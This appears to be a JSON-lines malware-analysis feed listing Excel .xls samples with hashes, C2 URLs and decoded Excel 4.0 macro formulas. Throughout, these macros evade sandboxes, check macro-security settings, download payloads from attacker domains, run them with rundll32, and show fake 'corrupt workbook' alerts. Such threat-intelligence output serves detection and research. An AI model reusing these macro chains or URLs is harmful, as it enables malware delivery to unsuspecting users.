/y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"R1vwzUr86l\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"533efbd30cd8a809c8dc16e9054813250972ada487ab923dd4356b7fa7eff627"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"533efbd30cd8a809c8dc16e9054813250972ada487ab923dd4356b7fa7eff627","filesize":167936,"md5":"55b66aea8b331299b10e7377274f09bb","sha1":"cc45211b0b043e7fe120731b9ba03e3d82dbe6a0","sha256":"533efbd30cd8a809c8dc16e9054813250972ada487ab923dd4356b7fa7eff627","sha512":"bdc4319be2706a6bfd65a10906f147e5ad0d0f031cb64d096fe1f3ae831603aa90583e7b45b63ebd15de2b01e47b49c1020a15cf9509086a2f24b3a8969bac06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"533efbd30cd8a809c8dc16e9054813250972ada487ab923dd4356b7fa7eff627.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bOnMg2sXCu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"535439696baa979f0b67c0b2401bfb889b42f02f31fe825aa6760309b89e8567"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"535439696baa979f0b67c0b2401bfb889b42f02f31fe825aa6760309b89e8567","filesize":144896,"md5":"c1eb5ad1294f22292d73008b4926b3d8","sha1":"9614f7398d1b37e281aee005eef946eab15dd49b","sha256":"535439696baa979f0b67c0b2401bfb889b42f02f31fe825aa6760309b89e8567","sha512":"2d92718c173e8d5a747735109a63f5363eef85f9fea4ab4c1ec8ebc301d6be52d4a86292418336d7f05d0f0b32ebb0e01d5ea3da1dd7bc0a544a4cf52c793620","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"535439696baa979f0b67c0b2401bfb889b42f02f31fe825aa6760309b89e8567.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53644b0c4bc07166736bd9b58c5215e90ef64e035fbc812ff73b856601b4441f"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"53644b0c4bc07166736bd9b58c5215e90ef64e035fbc812ff73b856601b4441f","filesize":209920,"md5":"240ab0e614bf42caa23caf3fa5e049ba","sha1":"4ccfabaa6977052502d1cdecc7abbcf870aaa755","sha256":"53644b0c4bc07166736bd9b58c5215e90ef64e035fbc812ff73b856601b4441f","sha512":"04efdbab089af00f4f16eb3b513ecb05d39f774b983e675806fc76cd6fec69934202443bb0167f32105845102c91eb43d4247a077a8d48b63c4b2bd1696906bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53644b0c4bc07166736bd9b58c5215e90ef64e035fbc812ff73b856601b4441f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l5hUMhWPDV\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5368a83bd0fe4a6d5101bfff3672efc6bbde689289102462a548217d9b0aaccb"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"5368a83bd0fe4a6d5101bfff3672efc6bbde689289102462a548217d9b0aaccb","filesize":170496,"md5":"125cf9aeaa9b71a88e960822b43a6569","sha1":"06cd85877ba4bde99ce1c04c3f434ec96bdabf17","sha256":"5368a83bd0fe4a6d5101bfff3672efc6bbde689289102462a548217d9b0aaccb","sha512":"b1b201bdc77559be08ea72d75c19904c30781232ab5459238c55840eeb8aa2a2b9d011f671e1b5fe1e17f5469bca2ac7526bf77d26288f1733aa0f361096aa1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5368a83bd0fe4a6d5101bfff3672efc6bbde689289102462a548217d9b0aaccb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LGIrlNiC0U\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"536b2e75c78614f405e9d57a878ec1c0a545f98a5569214cc83d32ba936c79a5"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"536b2e75c78614f405e9d57a878ec1c0a545f98a5569214cc83d32ba936c79a5","filesize":170496,"md5":"581f6a4f74e4328f415ed2e241a57c4b","sha1":"098803e669b81055e94e4cc9b208cfa4c12ce6b0","sha256":"536b2e75c78614f405e9d57a878ec1c0a545f98a5569214cc83d32ba936c79a5","sha512":"7a02e5dcbda8974f38534a813130c1d759e7458f295e74d8f3b0175330aeed278d83da9180c1cbec740e4b438e163e0f710719f3c9a15433a501f297c9c24473","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"536b2e75c78614f405e9d57a878ec1c0a545f98a5569214cc83d32ba936c79a5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6lxmfRzLjf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"537be0dd039f6066b7c13c7f6b70e9d3db895c5835f42b57f12a5f80968cdf42"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"537be0dd039f6066b7c13c7f6b70e9d3db895c5835f42b57f12a5f80968cdf42","filesize":170496,"md5":"1b90c4fba5483d0201fce6f2678450c0","sha1":"21aab3ad7059621f32e304c23fb4b99cb8089ece","sha256":"537be0dd039f6066b7c13c7f6b70e9d3db895c5835f42b57f12a5f80968cdf42","sha512":"5f7ac7c1768ed7288633d191c16f7818a77b64579d6b27f627144d10f2fc819e00abfba2d2c852b2e274cbdf532e3f8b992c564990c3188b8cfc2aebcc699e6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"537be0dd039f6066b7c13c7f6b70e9d3db895c5835f42b57f12a5f80968cdf42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DxooYjkBkP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"539b316f2d163f91b9e70a79a776567bb3ad5ee6e1e64da0f7c566fb12d8abc2"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"539b316f2d163f91b9e70a79a776567bb3ad5ee6e1e64da0f7c566fb12d8abc2","filesize":226304,"md5":"e6bcc46676263b7f8c3526db43197c0c","sha1":"a5a11e5bcd362925d73495f2dff972e1c27a8ec4","sha256":"539b316f2d163f91b9e70a79a776567bb3ad5ee6e1e64da0f7c566fb12d8abc2","sha512":"696eb50bccc7856a609ca90102ff788e1f8f7610926d2f55a5ce4d5de5378e7220cbec2e1b0d9c97994ef43e50bd6f0391af90b4d7d3e50acda913ec722aefa3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"539b316f2d163f91b9e70a79a776567bb3ad5ee6e1e64da0f7c566fb12d8abc2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vjzd2eKwop\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53a8fbe95e7e911090486f481d55d6e48c1ade671d555cfa021ea10de6d60f5f"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"53a8fbe95e7e911090486f481d55d6e48c1ade671d555cfa021ea10de6d60f5f","filesize":206336,"md5":"223f1c4013ae025e495792adebe1c34a","sha1":"800655a140e88e704d157660f6cd8d9d37ffe4be","sha256":"53a8fbe95e7e911090486f481d55d6e48c1ade671d555cfa021ea10de6d60f5f","sha512":"055606d79fd12b5cd90dba2022f87bbffc99dc74f6ade47641e6d90bff87c5e49775c776ac47bbe0162d2d67d5818b1958eb3b42d1b036ccb4e2e028672ef642","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53a8fbe95e7e911090486f481d55d6e48c1ade671d555cfa021ea10de6d60f5f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qIFD4EgqgJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53ade28317209139cfb991f3c3039a9c20a1cfe8fcc868adc82b907a252ff1f6"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"53ade28317209139cfb991f3c3039a9c20a1cfe8fcc868adc82b907a252ff1f6","filesize":209920,"md5":"1dbbe06e68e4301cd751402ad73c5fcf","sha1":"5b20293e354641bc8cef933144a165f8dbc75644","sha256":"53ade28317209139cfb991f3c3039a9c20a1cfe8fcc868adc82b907a252ff1f6","sha512":"82a1de5a4784e73f988f664599b4663a6f604548f5ab3487ddb35d4f7503722c9727ff27a440fd7de61658e2fc8a7a67044e8d125707467fd651ced2b8a5525d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53ade28317209139cfb991f3c3039a9c20a1cfe8fcc868adc82b907a252ff1f6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8GBKBfZouP\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53bd2213d80cd835976f3db7ec547555ce0a40c02bd353c1a6dfc4b4cec32b8c"},"analysis":{"reported":"2020-04-09T16:16:19Z","score":10},"files":[{"filename":"53bd2213d80cd835976f3db7ec547555ce0a40c02bd353c1a6dfc4b4cec32b8c","filesize":167936,"md5":"e2fd6bd6236c95876646a1664e4aa25c","sha1":"eca5903ab29d3732f575e0a0924e796d007298ea","sha256":"53bd2213d80cd835976f3db7ec547555ce0a40c02bd353c1a6dfc4b4cec32b8c","sha512":"3e4e53cf1fa6914a1ce97132255aebde833eda31ba671b344f042a4e6135233b449ca8204a7fdb00766504753ee4239d595facc046d5f81bbf0844bf2d07f564","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53bd2213d80cd835976f3db7ec547555ce0a40c02bd353c1a6dfc4b4cec32b8c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bKhiTLeCJT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53cd5f7608f451f6de8c95e6a2922fddcd41894d4ee2a560066d2bc07b6e01d7"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53cd5f7608f451f6de8c95e6a2922fddcd41894d4ee2a560066d2bc07b6e01d7","filesize":168960,"md5":"a99b65ff38e39d35136e02a6b1baa1ca","sha1":"104fed59b84c7d1be17cf7a820b4706e1c636c28","sha256":"53cd5f7608f451f6de8c95e6a2922fddcd41894d4ee2a560066d2bc07b6e01d7","sha512":"4abb0700fe76c6a198e4ff550169807d28ffd853d52de7aca92ee2fea3acb6e1fa6ab60f4ac9cdba079bee1d65196f794597dde4190ccddeaa901f1419ca4023","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53cd5f7608f451f6de8c95e6a2922fddcd41894d4ee2a560066d2bc07b6e01d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CujORgUuQ8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53d60332f250fe4866d13047dbcff48d424989a095cd564959e81abf53a55e92"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53d60332f250fe4866d13047dbcff48d424989a095cd564959e81abf53a55e92","filesize":167936,"md5":"1440607782df14d51161a7442b52d163","sha1":"a582fc7fbd5f4dd7c40291007fabb4f035b38723","sha256":"53d60332f250fe4866d13047dbcff48d424989a095cd564959e81abf53a55e92","sha512":"646eef1bdc45cc78c6c66a6a52d06795e91d5edd1e70ba505ba749c1a10dc06c69772715e73c3031cf8e7f2af47ff3eb225cba207d0dd41ad24a301af27a1bc6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53d60332f250fe4866d13047dbcff48d424989a095cd564959e81abf53a55e92.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7jLoAEjMD8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53d708639ee9536030c4ae56bb39131c77233871a72e9844a7e03c80291a11b0"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53d708639ee9536030c4ae56bb39131c77233871a72e9844a7e03c80291a11b0","filesize":185344,"md5":"140540fed9fefc4f215150babf1ffd1b","sha1":"c071cb4ee4b75ec2600cde06074eb48d6cc38ead","sha256":"53d708639ee9536030c4ae56bb39131c77233871a72e9844a7e03c80291a11b0","sha512":"fca5008362bfdfbd3c1b155ed4043f36892c27061c122f6c9c84d3666c7abfb7df33721175839651bcdb6be07d6170af9a5871e29dfe1a99e41eed050c8bd61b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53d708639ee9536030c4ae56bb39131c77233871a72e9844a7e03c80291a11b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53db055cc66af2b9d060a22a086d25d3431c662e1f1eccdf54631696e981f040"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53db055cc66af2b9d060a22a086d25d3431c662e1f1eccdf54631696e981f040","filesize":112128,"md5":"79294cc4ca5d4547e5060c3e7c3dbf5c","sha1":"ed77ea07ce1dc01167c7f420d2ffb931862c9d23","sha256":"53db055cc66af2b9d060a22a086d25d3431c662e1f1eccdf54631696e981f040","sha512":"c46c3cf7815eec33ea341d188daef0d23ddfd7d8318d1e145df0519c6d50af76aefc45fbcf06045feb672456b6a8ac75667930822ff20d94d7c725cee44ac927","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53db055cc66af2b9d060a22a086d25d3431c662e1f1eccdf54631696e981f040.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53ded2114b4cf99992df5267d8fb70f0a2580b3c9592f83251e66be3b506128d"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53ded2114b4cf99992df5267d8fb70f0a2580b3c9592f83251e66be3b506128d","filesize":167936,"md5":"d663bd3251bed3c250d32d51a275489c","sha1":"f9a69e724c72b029611abd40ef529b491295f775","sha256":"53ded2114b4cf99992df5267d8fb70f0a2580b3c9592f83251e66be3b506128d","sha512":"2f4950887a75cbec433ef11afa3848af69cd4e12b358f8cff4ec4b6116ddb27d2a0e8af24e0f157d9a74dcfed49d3dfcbbafbaf6f67f2f7458f4ff82bd6df2b3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53ded2114b4cf99992df5267d8fb70f0a2580b3c9592f83251e66be3b506128d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fNBZouuPge\",TRUE)\nGOTO(R$0C$19)"}}}]}
